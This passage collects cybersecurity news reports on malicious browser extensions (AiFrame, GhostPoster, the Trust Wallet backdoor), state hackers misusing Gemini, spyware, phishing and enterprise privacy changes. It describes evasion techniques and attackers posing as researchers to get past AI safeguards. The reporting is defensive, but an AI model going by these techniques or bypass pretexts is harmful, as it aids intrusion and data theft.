- A1: Used to retrieve attacker-issued commands and update status responses (e.g., S-C-R or Server-Command-Success)
- A2–An: Facilitates the transfer of data such as command outputs and files
- V1: Stores system-related data from the compromised endpoint
Experts at browser security platform LayerX found the malicious extension campaign and labelled it AiFrame. They discovered that all studied extensions are part of the same malicious attack as they interact with infrastructure under a single domain, tapnetic[.]pro.
Experts said that the most famous extension in the AiFrame operation had 80,000 users and was termed Gemini AI Sidebar (fppbiomdkfbhgjjdmojlogeceejinadg), but it isn't available in the Chrome Web Store.
According to BleepingComputer, other extensions with over thousand users are still active on Google's repository for Chrome extensions. The names might be different, but the classification is the same.
LayerX discovered that all 30 extensions have the same Javascript logic, permissions, internal structure, and backend infrastructure.
The infected browser add-ons do not apply AI functionality locally.
This can be risky because publishers can modify the extensions' logic without any update, similar to the Microsoft Office Add-ins. This helps them escape the new review.
Besides this, the extension takes out page content from the sites that users visit. This includes verification pages via Mozilla's Readability library.
According to LayerX, a group of 15 extensions exclusively target Gmail data by injecting UI components with a content script that executes at "document_start" on "mail.google.com." The script repeatedly retrieves email thread text using ".textContent" after reading visible email content straight from the DOM. Even email drafts can be recorded, according to the researchers. According to a report released today by LayerX, "the extracted email content is passed into the extension's logic and transmitted to third-party backend infrastructure controlled by the extension operator when Gmail-related features like AI-assisted replies or summaries are invoked."
Additionally, the extensions have a way for remotely triggering speech recognition and transcript creation that uses the "Web Speech API" to provide operators with the results. The extensions may potentially intercept chats from the victim's surroundings, depending on the permissions that are provided. Google has not responded to BleepingComputer's request for comment on LayerX results by the time of publication. For the full list of malicious extensions, it is advised to consult LayerX's list of indicators of compromise. Users should reset the passwords for all accounts if the intrusion is verified.
Cybersecurity investigators at Google have confirmed that state-sponsored hacking groups are actively relying on generative artificial intelligence to improve how they research targets, prepare cyber campaigns, and develop malicious tools. According to the company’s threat intelligence teams, North Korea–linked attackers were observed using the firm’s AI platform, Gemini, to collect and summarize publicly available information about organizations and employees they intended to target. This type of intelligence gathering allows attackers to better understand who works at sensitive companies, what technical roles exist, and how to approach victims in a convincing way.
Investigators explained that the attackers searched for details about leading cybersecurity and defense companies, along with information about specific job positions and salary ranges. These insights help threat actors craft more realistic fake identities and messages, often impersonating recruiters or professionals to gain the trust of their targets. Security experts warned that this activity closely resembles legitimate professional research, which makes it harder for defenders to distinguish normal online behavior from hostile preparation.
The hacking group involved, tracked as UNC2970, is linked to North Korea and overlaps with a network widely known as Lazarus Group. This group has previously run a long-term operation in which attackers pretended to offer job opportunities to professionals in aerospace, defense, and energy companies, only to deliver malware instead. Researchers say this group continues to focus heavily on defense-related targets and regularly impersonates corporate recruiters to begin contact with victims.
The misuse of AI is not limited to one actor. Multiple hacking groups connected to China and Iran were also found using AI tools to support different phases of their operations. Some groups used AI to gather targeted intelligence, including collecting email addresses and account details. Others relied on AI to analyze software weaknesses, prepare technical testing plans, interpret documentation from open-source tools, and debug exploit code. Certain actors used AI to build scanning tools and malicious web shells, while others created fake online identities to manipulate individuals into interacting with them. In several cases, attackers claimed to be security researchers or competition participants in order to bypass safety restrictions built into AI systems.
Researchers also identified malware that directly communicates with AI services to generate harmful code during an attack. One such tool, HONESTCUE, requests programming instructions from AI platforms and receives source code that is used to build additional malicious components on the victim’s system. Instead of storing files on disk, this malware compiles and runs code directly in memory using legitimate system tools, making detection and forensic analysis more difficult. Separately, investigators uncovered phishing kits designed to look like cryptocurrency exchanges. These fake platforms were built using automated website creation tools from Lovable AI and were used to trick victims into handing over login credentials. Parts of this activity were linked to a financially motivated group known as UNC5356.
Security teams also reported an increase in so-called ClickFix campaigns. In these schemes, attackers use public sharing features on AI platforms to publish convincing step-by-step guides that appear to fix common computer problems. In reality, these instructions lead users to install malware that steals personal and financial data. This trend was first flagged in late 2025 by Huntress.
Another growing threat involves model extraction attacks. In these cases, adversaries repeatedly query proprietary AI systems in order to observe how they respond and then train their own models to imitate the same behavior. In one large campaign, attackers sent more than 100,000 prompts to replicate how an AI model reasons across many tasks in different languages. Researchers at Praetorian demonstrated that a functional replica could be built using a relatively small number of queries and limited training time. Experts warned that keeping AI model parameters secret is not enough, because every response an AI system provides can be used as training data for attackers.
Google, which launched its AI Cyber Defense Initiative in 2024, stated that artificial intelligence is increasingly amplifying the capabilities of cybercriminals by improving their efficiency and speed. Company representatives cautioned that as attackers integrate AI into routine operations, the volume and sophistication of attacks will continue to rise. Security specialists argue that defenders must adopt similar AI-powered tools to automate threat detection, accelerate response times, and operate at the same machine-level speed as modern attacks.
Cybersecurity experts found 17 extensions for Chrome, Edge, and Firefox browsers which track user's internet activity and install backdoors for access. The extensions were downloaded over 840,000 times.
The campaign is not new. LayerX claimed that the campaign is part of GhostPoster, another campaign first found by Koi Security last year in December. Last year, researchers discovered 17 different extensions that were downloaded over 50,000 times and showed the same monitoring behaviour and deploying backdoors.
Few extensions from the new batch were uploaded in 2020, exposing users to malware for years. The extensions appeared in places like the Edge store and later expanded to Firefox and Chrome.
Few extensions stored malicious JavaScript code in the PNG logo. The code is a kind of instruction on downloading the main payload from a remote server.
The main payload does multiple things. It can hijack affiliate links on famous e-commerce websites to steal money from content creators and influencers. “The malware watches for visits to major e-commerce platforms. When you click an affiliate link on Taobao or JD.com, the extension intercepts it. The original affiliate, whoever was supposed to earn a commission from your purchase, gets nothing. The malware operators get paid instead,” said Koi researchers.
After that, it deploys Google Analytics tracking into every page that people open, and removes security headers from HTTP responses.
In the end, it escapes CAPTCHA via three different ways, and deploy invisible iframes that do ad frauds, click frauds, and tracking. These iframes disappear after 15 seconds.
Besides this, all extensions were deleted from the repositories, but users shoul also remove them personally.
This staged execution flow demonstrates a clear evolution toward longer dormancy, modularity, and resilience against both static and behavioral detection mechanisms,” said LayerX.
The PNG steganography technique is employed by some. Some people download JavaScript directly and include it into each page you visit. Others employ bespoke ciphers to encode the C&C domains and use concealed eval() calls. The same assailant. identical servers. many methods of delivery. This appears to be testing several strategies to see which one gets the most installs, avoids detection the longest, and makes the most money.
This campaign reflects a deliberate shift toward patience and precision. By embedding malicious code in images, delaying execution, and rotating delivery techniques across identical infrastructure, the attackers test which methods evade detection longest. The strategy favors longevity and profit over speed, exposing how browser ecosystems remain vulnerable to quietly persistent threats.
Google owned Mandiant’s threat intelligence team is tracking the attacks under various clusters: UNC6661, UNC6671, and UNC6240 (aka ShinyHunters). These gangs might be improving their attack tactics. "While this methodology of targeting identity providers and SaaS platforms is consistent with our prior observations of threat activity preceding ShinyHunters-branded extortion, the breadth of targeted cloud platforms continues to expand as these threat actors seek more sensitive data for extortion," Mandiant said.
"Further, they appear to be escalating their extortion tactics with recent incidents, including harassment of victim personnel, among other tactics.”
UNC6661 was pretending to be IT staff sending employees to credential harvesting links tricking them into multi-factor authentication (MFA) settings. This was found during mid-January 2026.
Threat actors used stolen credentials to register their own device for MFA and further steal data from SaaS platforms. In one incident, the hacker exploited their access to infected email accounts to send more phishing emails to users in cryptocurrency based organizations.
The emails were later deleted to hide the tracks. Experts also found UNC6671 mimicking IT staff to fool victims to steal credentials and MFA login codes on credential harvesting websites since the start of this year. In a few incidents, the hackers got access to Okta accounts.
UNC6671 leveraged PowerShell to steal sensitive data from OneDrive and SharePoint.
The use of different domain registrars to register the credential harvesting domains (NICENIC for UNC6661 and Tucows for UNC6671) and the fact that an extortion email sent after UNC6671 activity did not overlap with known UNC6240 indicators are the two main differences between UNC6661 and UNC6671.
This suggests that other groups of people might be participating, highlighting how nebulous these cybercrime organizations are. Furthermore, the targeting of bitcoin companies raises the possibility that the threat actors are searching for other opportunities to make money.
Google has updated its Chrome browser by adding a built-in artificial intelligence panel powered by its Gemini model, marking a stride toward automated web interaction. The change reflects the company’s broader push to integrate AI directly into everyday browsing activities.
Chrome, which currently holds more than 70 percent of the global browser market, is now moving in the same direction as other browsers that have already experimented with AI-driven navigation. The idea behind this shift is to allow users to rely on AI systems to explore websites, gather information, and perform online actions with minimal manual input.
The Gemini feature appears as a sidebar within Chrome, reducing the visible area of websites to make room for an interactive chat interface. Through this panel, users can communicate with the AI while keeping their main work open in a separate tab, allowing multitasking without constant tab switching.
Google explains that this setup can help users organize information more effectively. For example, Gemini can compare details across multiple open tabs or summarize reviews from different websites, helping users make decisions more quickly.
For subscribers to Google’s higher-tier AI plans, Chrome now offers an automated browsing capability. This allows Gemini to act as a software agent that can follow instructions involving multiple steps. In demonstrations shared by Google, the AI can analyze images on a webpage, visit external shopping platforms, identify related products, and add items to a cart while staying within a user-defined budget. The final purchase, however, still requires user approval.
The browser update also includes image-focused AI tools that allow users to create or edit images directly within Chrome, further expanding the browser’s role beyond simple web access.
Chrome’s integration with other applications has also been expanded. With user consent, Gemini can now interact with productivity tools, communication apps, media services, navigation platforms, and shopping-related Google services. This gives the AI broader context when assisting with tasks.
Google has indicated that future updates will allow Gemini to remember previous interactions across websites and apps, provided users choose to enable this feature. The goal is to make AI assistance more personalized over time.
Despite these developments, automated browsing faces resistance from some websites. Certain platforms have already taken legal or contractual steps to limit AI-driven activity, particularly for shopping and transactions. This underlines the ongoing tension between automation and website control.
To address these concerns, Google says Chrome will request human confirmation before completing sensitive actions such as purchases or social media posts. The browser will also support an open standard designed to allow AI-driven commerce in collaboration with participating retailers.
Currently, these features are available on Chrome for desktop systems in the United States, with automated browsing restricted to paid subscribers. How widely such AI-assisted browsing will be accepted across the web remains uncertain.
Although advanced spyware attacks do not affect most smartphone users, cybersecurity researchers stress that awareness is essential as these tools continue to spread globally. Even individuals who are not public figures are advised to remain cautious.
In December, hundreds of iPhone and Android users received official threat alerts stating that their devices had been targeted by spyware. Shortly after these notifications, Apple and Google released security patches addressing vulnerabilities that experts believe were exploited to install the malware on a small number of phones.
Spyware poses an extreme risk because it allows attackers to monitor nearly every activity on a smartphone. This includes access to calls, messages, keystrokes, screenshots, notifications, and even encrypted platforms such as WhatsApp and Signal. Despite its intrusive capabilities, spyware is usually deployed in targeted operations against journalists, political figures, activists, and business leaders in sensitive industries.
High-profile cases have demonstrated the seriousness of these attacks. Former Amazon chief executive Jeff Bezos and Hanan Elatr, the wife of murdered Saudi dissident Jamal Khashoggi, were both compromised through Pegasus spyware developed by the NSO Group. These incidents illustrate how personal data can be accessed without user awareness.
Spyware activity remains concentrated within these circles, but researchers suggest its reach may be expanding. In early December, Google issued threat notifications and disclosed findings showing that an exploit chain had been used to silently install Predator spyware. Around the same time, the U.S. Cybersecurity and Infrastructure Security Agency warned that attackers were actively exploiting mobile messaging applications using commercial surveillance tools.
One of the most dangerous techniques involved is known as a zero-click attack. In such cases, a device can be infected without the user clicking a link, opening a message, or downloading a file. According to Malwarebytes researcher Pieter Arntz, once infected, attackers can read messages, track keystrokes, capture screenshots, monitor notifications, and access banking applications. Rocky Cole of iVerify adds that spyware can also extract emails and texts, steal credentials, send messages, and access cloud accounts.
Spyware may also spread through malicious links, fake applications, infected images, browser vulnerabilities, or harmful browser extensions. Recorded Future’s Richard LaTulip notes that recent research into malicious extensions shows how tools that appear harmless can function as surveillance mechanisms. These methods, often associated with nation-state actors, are designed to remain hidden and persistent.
Governments and spyware vendors frequently claim such tools are used only for law enforcement or national security. However, Amnesty International researcher Rebecca White states that journalists, activists, and others have been unlawfully targeted worldwide, using spyware as a method of repression. Thai activist Niraphorn Onnkhaow was targeted multiple times during pro-democracy protests between 2020 and 2021, eventually withdrawing from activism due to fears her data could be misused.
Detecting spyware is challenging. Devices may show subtle signs such as overheating, performance issues, or unexpected camera or microphone activation. Official threat alerts from Apple, Google, or Meta should be treated seriously. Leaked private information can also indicate compromise.
To reduce risk, Apple offers Lockdown Mode, which limits certain functions to reduce attack surfaces. Apple security executive Ivan Krstić states that widespread iPhone malware has not been observed outside mercenary spyware campaigns. Apple has also introduced Memory Integrity Enforcement, an always-on protection designed to block memory-based exploits.
Google provides Advanced Protection for Android, enhanced in Android 16 with intrusion logging, USB safeguards, and network restrictions.
Experts recommend avoiding unknown links, limiting app installations, keeping devices updated, avoiding sideloading, and restarting phones periodically. However, confirmed infections often require replacing the device entirely. Organizations such as Amnesty International, Access Now, and Reporters Without Borders offer assistance to individuals who believe they have been targeted.
Security specialists advise staying cautious without allowing fear to disrupt normal device use.
Trust Wallets in a post on X said, “We’ve identified a security incident affecting Trust Wallet Browser Extension version 2.68 only. Users with Browser Extension 2.68 should disable and upgrade to 2.69.”
CZ has assured that the company is investigating how threat actors were able to compromise the new version.
Mobile-only users and browser extension versions are not impacted. User funds are SAFE,” Zhao wrote in a post on X.
The compromise happened because of a flaw in a version of the Trust Wallet Google Chrome browser extension.
If you suffered the compromise of Browser Extension v2.68, follow these steps on Trust Wallet X site:
Please wait to open the Browser Extension until you have updated to Extension version 2.69. This helps safeguard the security of your wallet and avoids possible problems.
Social media users expressed their views. One said, “The problem has been going on for several hours,” while another user complained that the company ”must explain what happened and compensate all users affected. Otherwise reputation is tarnished.” A user also asked, “How did the vulnerability in version 2.68 get past testing, and what changes are being made to prevent similar issues?”
Google is reportedly preparing to extend a smart assistance feature beyond its Pixel smartphones to the wider Android ecosystem. The functionality, referred to as Contextual Suggestions, closely resembles Magic Cue, a software feature currently limited to Google’s Pixel 10 lineup. Early signs suggest the company is testing whether this experience can work reliably across a broader range of Android devices.
Contextual Suggestions is designed to make everyday phone interactions more efficient by offering timely prompts based on a user’s regular habits. Instead of requiring users to manually open apps or repeat the same steps, the system aims to anticipate what action might be useful at a given moment. For example, if someone regularly listens to a specific playlist during workouts, their phone may suggest that music when they arrive at the gym. Similarly, users who cast sports content to a television at the same time every week may receive an automatic casting suggestion at that familiar hour.
According to Google’s feature description, these suggestions are generated using activity patterns and location signals collected directly on the device. This information is stored within a protected, encrypted environment on the phone itself. Google states that the data never leaves the device, is not shared with apps, and is not accessible to the company unless the user explicitly chooses to share it for purposes such as submitting a bug report.
Within this encrypted space, on-device artificial intelligence analyzes usage behavior to identify recurring routines and predict actions that may be helpful. While apps and system services can present the resulting suggestions, they do not gain access to the underlying data used to produce them. Only the prediction is exposed, not the personal information behind it.
Privacy controls are a central part of the feature’s design. Contextual data is automatically deleted after 60 days by default, and users can remove it sooner through a “Manage your data” option. The entire feature can also be disabled for those who prefer not to receive contextual prompts at all.
Contextual Suggestions has begun appearing for a limited number of users running the latest beta version of Google Play Services, although access remains inconsistent even among beta testers. This indicates that the feature is still under controlled testing rather than a full rollout. When available, it appears under Settings > Google or Google Services > All Services > Others.
Google has not yet clarified which apps support Contextual Suggestions. Based on current observations, functionality may be restricted to system-level or Google-owned apps, though this has not been confirmed. The company also mentions the use of artificial intelligence but has not specified whether older or less powerful devices will be excluded due to hardware limitations.
As testing continues, further details are expected to emerge regarding compatibility, app support, and wider availability. For now, Contextual Suggestions reflects Google’s effort to balance convenience with on-device privacy, while cautiously evaluating how such features perform across the diverse Android ecosystem.
Google recently announced the launch of its Emergency Location Service (ELS) in India for compatible Android smartphones. It means that users who are in an emergency can call or contact emergency service providers like police, firefighters, and healthcare professionals. ELS can share the user's accurate location immediately.
Uttar Pradesh (UP) in India has become the first state to operationalise ELS for Android devices. Earlier, ELS was rolled out to devices having Android 6 or newer versions. For integration, however, ELS will require state authorities to connect it with their services for activation.
According to Google, the ELS function on Android handsets has been activated in India. The built-in emergency service will enable Android users to communicate their location by call or SMS in order to receive assistance from emergency service providers, such as firefighters, police, and medical personnel.
ELS on Android collects information from the device's GPS, Wi-Fi, and cellular networks in order to pinpoint the user's exact location, with an accuracy of up to 50 meters.
However, local wireless and emergency infrastructure operators must enable support for the ELS capability. The first state in India to "fully" operationalize the service for Android devices is Uttar Pradesh.
ELS assistance has been integrated with the emergency number 112 by the state police in partnership with Pert Telecom Solutions. It is a free service that solely monitors a user's position when an Android phone dials 112.
Google added that all suitable handsets running Android 6.0 and later versions now have access to the ELS functionality.
Even if a call is dropped within seconds of being answered, the business claims that ELS in Android has enabled over 20 million calls and SMS messages to date. ELS is supported by Android Fused Location Provider- Google's machine learning tool.
According to Google, the feature is only available to emergency service providers and it will never collect or share accurate location data for itself. The ELS data will be sent directly only to the concerned authority.
Recently, Google also launched the Emergency Live Video feature for Android devices. It lets users share their camera feed during an emergency via a call or SMS with the responder. But the emergency service provider has to get user approval for the access. The feature is shown on screen immediately when the responder requests a video from their side. User can accept the request and provide a visual feed or reject the request.
Trust Wallet recently disclosed that the Sha1-Hulur supply chain attack last year in November might be responsible for the compromise of its Google Chrome extension, causing $8.5 million assets theft.
According to the company, its "developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source code and the Chrome Web Store (CWS) API key." The attacker obtained full CWS API access via the leaked key, allowing builds to be uploaded directly without Trust Wallet's standard release process, which requires internal approval/manual review."
Later, the threat actor registered the domain "metrics-trustwallet[.]com" and deployed a malware variant of the extension with a backdoor that could harvest users' wallet mnemonic phrases to the sub-domain "api.metrics-trustwallet[.]com."
According to Koi, a cybersecurity company, the infected code activates with each unlock causing sensitive data to be harvested. It doesn't matter if the victims used biometrics or password, and if the wallet extension was opened once after the 2.68 version update or in use for months.
The researchers Yuval Ronen and Oren Yomtov reported that, "the code loops through every wallet in the user's account, not just the active one. If you had multiple wallets configured, all of them were compromised. Seed phrases are stuffed into a field called errorMessage inside what looks like standard unlock telemetry. A casual code review sees an analytics event tracking unlock success with some error metadata."
Besides this, the analysis also revealed that querying the server directly gave the reply "He who controls the spice controls the universe." It's a Dune reference that is found in similar incidents like the Shai-Hulud npm. "The Last-Modified header reveals the infrastructure was staged by December 8 – over two weeks before the malicious update was pushed on December 24," it added. "This wasn't opportunistic. It was planned."
The findings came after Trust Wallet requested its one million users of Chrome extension to update to variant 2.69 after a malicious update (variant 2.68) was triggered by unknown hackers on December 24, 2025, in the browser's extension marketplace.
The breach caused $8.5 million loss in cryptocurrency assets being stolen from 2,520 wallet addresses. The wallet theft was first reported after the malicious update.
Post-incident, Trust Wallet has started a reimbursement claim process for affected victims. The company has implemented additional monitoring measures related to its release processes.
The Indian government is pushing a telecom industry proposal that will compel smartphone companies to allow satellite location tracking that will be activated 24x7 for surveillance.
Tech giants Samsung, Google, and Apple have opposed this move due to privacy concerns. Privacy debates have stirred in India after the government was forced to repeal an order that mandated smartphone companies to pre-install a state run cyber safety application on all devices. Activists and opposition raised concerns about possible spying.
Recently, the government had been concerned that agencies didn't get accurate locations when legal requests were sent to telecom companies during investigations. Currently, the firm only uses cellular tower data that provides estimated area location, this can be sometimes inaccurate.
The Cellular Operators Association of India (COAI) representing Bharti Airtel and Reliance Jio suggested accurate user locations be provided if the government mandates smartphone firms to turn on A-GPS technology which uses cellular data and satellite signals.
If this is implemented, location services will be activated in smartphones with no disable option. Samsung, Google, and Apple strongly oppose this proposal. A proposal to track user location is not present anywhere else in the world, according to lobbying group India Cellular & Electronics Association (ICEA), representing Google and Apple.
Reuters reached out to the India's IT and home ministries for clarity on the telecom industry's proposal but have received no replies. According to digital forensics expert Junade Ali, the "proposal would see phones operate as a dedicated surveillance device."
According to technology experts, utilizing A-GPS technology, which is normally only activated when specific apps are operating or emergency calls are being made, might give authorities location data accurate enough to follow a person to within a meter.
Globally, governments are constantly looking for new ways to improve in tracking the movements or data of mobile users. All Russian mobile phones are mandated to have a state-sponsored communications app installed. With 735 million smartphones as of mid-2025, India is the second-largest mobile market in the world.
According to Counterpoint Research, more than 95% of these gadgets are running Google's Android operating system, while the remaining phones are running Apple's iOS.
Apple and Google cautioned that their user base will include members of the armed forces, judges, business executives, and journalists, and that the proposed location tracking would jeopardize their security because they store sensitive data.
According to the telecom industry, even the outdated method of location tracking is becoming troublesome because smartphone manufacturers notify users via pop-up messages that their "carrier is trying to access your location."
Microsoft stirred controversy when it revealed a Teams update that could tell your organization when you're not at work. Google did the same. Say goodbye to end-to-end encryption. With this new RCS and SMS Android update, your RCS and SMS texts are no longer private.
According to Android Authority, "Google is rolling out Android RCS Archival on Pixel (and other Android) phones, allowing employers to intercept and archive RCS chats on work-managed devices. In simpler terms, your employer will now be able to read your RCS chats in Google Messages despite end-to-end encryption.”
This is only applicable to work-managed devices and doesn't impact personal devices. In regulated industries, it will only add RCS archiving to existing SMS archiving. In an organization, however, texting is different than emailing. In the former, employees sometimes share about their non-work life. End-to-end encryptions keep these conversations safe, but this will no longer be the case.
There is alot of misunderstanding around end-to-end encryption. It protects messages when they are being sent, but once they are on your device, they are decrypted and no longer safe.
According to Google, this is "a dependable, Android-supported solution for message archival, which is also backwards compatible with SMS and MMS messages as well. Employees will see a clear notification on their device whenever the archival feature is active.”
With this update, getting a phone at work is no longer as good as it seems. Employees have always been insecure about the risks in over-sharing on email, as it is easy to spy. But not texts.
The update will make things different. According to Google, “this new capability, available on Google Pixel and other compatible Android Enterprise devices gives your employees all the benefits of RCS — like typing indicators, read receipts, and end-to-end encryption between Android devices — while ensuring your organization meets its regulatory requirements.”
Because of organizational surveillance, employees at times turn to shadow IT systems such as Whatsapp and Signal to communicate with colleagues. The new Google update will only make things worse.
“Earlier,” Google said, ““employers had to block the use of RCS entirely to meet these compliance requirements; this update simply allows organizations to support modern messaging — giving employees messaging benefits like high-quality media sharing and typing indicators — while maintaining the same compliance standards that already apply to SMS messaging."
A recent Android update has marked a paradigm shifting change in how text messages are handled on employer-controlled devices. This means Google has introduced a feature called Android RCS Archival, which lets organisations capture and store all RCS, SMS, and MMS communications sent through Google Messages on fully managed work phones. While the messages remain encrypted in transport, they can now be accessed on the device itself once delivered.
This update is designed to help companies meet compliance and record-keeping requirements, especially in sectors that must retain communication logs for regulatory reasons. Until now, many organizations had blocked RCS entirely because of its encryption, which made it difficult to archive. The new feature gives them a way to support richer messaging while still preserving mandatory records.
Archiving occurs via authorized third-party software that integrates directly with Google Messages on work-managed devices. Once enabled by a company's IT, the software will log every interaction inside of a conversation, including messages received, sent, edited, or later deleted. Employees using these devices will see a notification when archiving is active, signaling their conversations are being logged.
Google's indicated that this functionality only refers to work-managed Android devices, personal phones and personal profiles are not impacted, and the update doesn't allow employers access to user data on privately-owned devices. The feature must also be intentionally switched on by the organisation; it is not automatically on.
The update also brings to the surface a common misconception about encrypted messaging: End-to-end encryption protects content only while it's in transit between devices. When a message lands on a device that is owned and administered by an employer, the organization has the technical ability to capture it. It does not extend to over-the-top platforms - such as WhatsApp or Signal - that manage their own encryption. Those apps can expose data as well in cases where backups aren't encrypted or when the device itself is compromised.
This change also raises a broader issue: one of counterparty risk. A conversation remains private only if both ends of it are stored securely. Screenshots, unsafe backups, and linked devices outside the encrypted environment can all leak message content. Work-phone archiving now becomes part of that wider set of risks users should be aware of.
For employees, the takeaway is clear: A company-issued phone is a workplace tool, not a private device. Any communication that originates from a fully managed device can be archived, meaning personal conversations should stay on a personal phone. Users reliant on encrypted platforms have reason to review their backup settings and steer clear of mixing personal communication with corporate technology.
Google's new archival option gives organisations a compliance solution that brings RCS in line with traditional SMS logging, while for workers it is a further reminder that privacy expectations shift the moment a device is brought under corporate management.
An ongoing security incident at Gainsight's customer-management platform has raised fresh alarms about how deeply third-party integrations can affect cloud environments. The breach centers on compromised OAuth tokens connected with Gainsight's Salesforce connectors, leaving unclear how many organizations touched and the type of information accessed.
Salesforce was the first to flag suspicious activity originating from Gainsight's connected applications. As a precautionary measure, Salesforce revoked all associated access tokens and, for some time, disabled the concerned integrations. The company also released detailed indicators of compromise, timelines of malicious activity, and guidance urging customers to review authentication logs and API usage within their own environments.
Gainsight later confirmed that unauthorized parties misused certain OAuth tokens linked to its Salesforce-connected app. According to its leadership, only a small number of customers have so far reported confirmed data impact. However, several independent security teams-including Google's Threat Intelligence Group-reported signs that the intrusion may have reached far more Salesforce instances than initially acknowledged. These differing numbers are not unusual: supply-chain incidents often reveal their full extent only after weeks of log analysis and correlation.
At this time, investigators understand the attack as a case of token abuse, not a failure of Salesforce's underlying platform. OAuth tokens are long-lived keys that let approved applications make API calls on behalf of customers. Once attackers have them, they can access the CRM records through legitimate channels, and the detection is far more challenging. This approach enables the intruders to bypass common login checks, and therefore Salesforce has focused on log review and token rotation as immediate priorities.
To enhance visibility, Gainsight has onboarded Mandiant to conduct a forensic investigation into the incident. The company is investigating historical logs, token behavior, connector activity, and cross-platform data flows to understand the attacker's movements and whether other services were impacted. As a precautionary measure, Gainsight has also worked with platforms including HubSpot, Zendesk, and Gong to temporarily revoke related tokens until investigators can confirm they are safe to restore.
The incident is similar to other attacks that happened this year, where other Salesforce integrations were used to siphon customer records without exploiting any direct vulnerability in Salesforce. Repeated patterns here illustrate a structural challenge: organizations may secure their main cloud platform rigorously, but one compromised integration can open a path to wider unauthorized access.
But for customers, the best steps are as straightforward as ever: monitor Salesforce authentication and API logs for anomalous access patterns; invalidate or rotate existing OAuth tokens; reduce third-party app permissions to the bare minimum; and, if possible, apply IP restrictions or allowlists to further restrict the range of sources from which API calls can be made.
Both companies say they will provide further updates and support customers who have been affected by the issue. The incident served as yet another wake-up call that in modern cloud ecosystems, the security of one vendor often relies on the security practices of all in its integration chain.
Many organisations are starting to recognise a security problem that has been forming silently in the background. Conversations employees hold with public AI chatbots can accumulate into a long-term record of sensitive information, behavioural patterns, and internal decision-making. As reliance on AI tools increases, these stored interactions may become a serious vulnerability that companies have not fully accounted for.
The concern resurfaced after a viral trend in late 2024 in which social media users asked AI models to highlight things they “might not know” about themselves. Most treated it as a novelty, but the trend revealed a larger issue. Major AI providers routinely retain prompts, responses, and related metadata unless users disable retention or use enterprise controls. Over extended periods, these stored exchanges can unintentionally reveal how employees think, communicate, and handle confidential tasks.
This risk becomes more severe when considering the rise of unapproved AI use at work. Recent business research shows that while the majority of employees rely on consumer AI tools to automate or speed up tasks, only a fraction of companies officially track or authorise such usage. This gap means workers frequently insert sensitive data into external platforms without proper safeguards, enlarging the exposure surface beyond what internal security teams can monitor.
Vendor assurances do not fully eliminate the risk. Although companies like OpenAI, Google, and others emphasize encryption and temporary chat options, their systems still operate within legal and regulatory environments. One widely discussed court order in 2025 required the preservation of AI chat logs, including previously deleted exchanges. Even though the order was later withdrawn and the company resumed standard deletion timelines, the case reminded businesses that stored conversations can resurface unexpectedly.
Technical weaknesses also contribute to the threat. Security researchers have uncovered misconfigured databases operated by AI firms that contained user conversations, internal keys, and operational details. Other investigations have demonstrated that prompt-based manipulation in certain workplace AI features can cause private channel messages to leak. These findings show that vulnerabilities do not always come from user mistakes; sometimes the supporting AI infrastructure itself becomes an entry point.
Criminals have already shown how AI-generated impersonation can be exploited. A notable example involved attackers using synthetic voice technology to imitate an executive, tricking an employee into transferring funds. As AI models absorb years of prompt history, attackers could use stylistic and behavioural patterns to impersonate employees, tailor phishing messages, or replicate internal documents.
Despite these risks, many companies still lack comprehensive AI governance. Studies reveal that employees continue to insert confidential data into AI systems, sometimes knowingly, because it speeds up their work. Compliance requirements such as GDPR’s strict data minimisation rules make this behaviour even more dangerous, given the penalties for mishandling personal information.
Experts advise organisations to adopt structured controls. This includes building an inventory of approved AI tools, monitoring for unsanctioned usage, conducting risk assessments, and providing regular training so staff understand what should never be shared with external systems. Some analysts also suggest that instead of banning shadow AI outright, companies should guide employees toward secure, enterprise-level AI platforms.
If companies fail to act, each casual AI conversation can slowly accumulate into a dataset capable of exposing confidential operations. While AI brings clear productivity benefits, unmanaged use may convert everyday workplace conversations into one of the most overlooked security liabilities of the decade.